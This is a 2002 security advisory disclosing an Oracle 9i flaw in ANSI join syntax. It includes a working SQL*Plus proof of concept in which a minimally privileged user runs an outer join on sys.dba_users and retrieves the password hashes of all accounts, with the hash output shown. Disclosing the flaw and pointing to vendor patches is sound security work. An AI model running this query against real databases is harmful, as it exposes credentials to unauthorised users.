Pentest Security Advisory : PTL-2002-02
Vulnerability with Oracle ANSI join syntax

Advisory Details

Author: Pete Finnigan
Date: 2nd May 2002
Reference: ptl-2002-02

Overview:

This advisory describes an issue with the ANSI join syntax in Oracle 9i. Oracle still supports the old syntax but in the ANSI syntax there is a serious security issue that allows any user to view any data.

Description:

here is an example:

SQL*Plus: Release 9.0.1.0.1 - Production on Tue Apr 16 15:16:45 2

(c) Copyright 2001 Oracle Corporation.  All rights reserved.


Connected to:
Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production
With the Partitioning option
JServer Release 9.0.1.1.1 - Production

SQL> connect / as sysdba
Connected.
SQL> CREATE USER us1 IDENTIFIED BY us11;

User created.

SQL> Grant Create Session to us1;

Grant succeeded.

SQL> connect us1/us11;
Connected.
SQL> select a.username, a.password
  2  from sys.dba_users a left outer join sys.dba_users b on
  3  b.username = a.username
  4  ;

USERNAME                       PASSWORD
------------------------------ ------------------------------
SYS                            D4C5016086B2DC6A
SYSTEM                         D4DF7931AB130E37
...

...
RMAN                           E7B5D92911C831E1
QS_CB                          CF9CFACF5AE24964
QS_CS                          91A00922D8C0F146

30 rows selected.

SQL>

This shows that a user with the barest of privileges, i.e. CREATE SESSION can actually see data in the data dictionary that should not be seen. In this example we can select the list of usernames and their hashes.

Test Environment:

These vulnerabilities have been tested on Oracle 9i version 9.0.1.x installed on Sun Solaris 2.8. All other platforms are vulnerable.

Recommendations:

Apply vendor patches.

Vendor Status:

The vendor has issued a bulletin and made patches available on this issue. See
http://otn.oracle.com/deploy/security/pdf/sql_joins_alert.pdf


arrow morePTL-2002-03

PTL-2002-01arrow more

Security Services

Pentest offers a thorough, yet adaptive range of security services to help customers address vulnerabilities in their network or applications. Services include: Secure Coding Workshops, SAST tools, Manual Penetration Testing and Security Audits.

read more arrow more

Database Services

Pentest offers a complete Database Security Assessment Service (DSAS) to businesses that rely on the security of the information held within their databases or have concerns relating to the security compliance of these systems.

read more arrow more

© Copyright Pentest Limited 2001 - 2016 All Rights Reserved. Privacy statement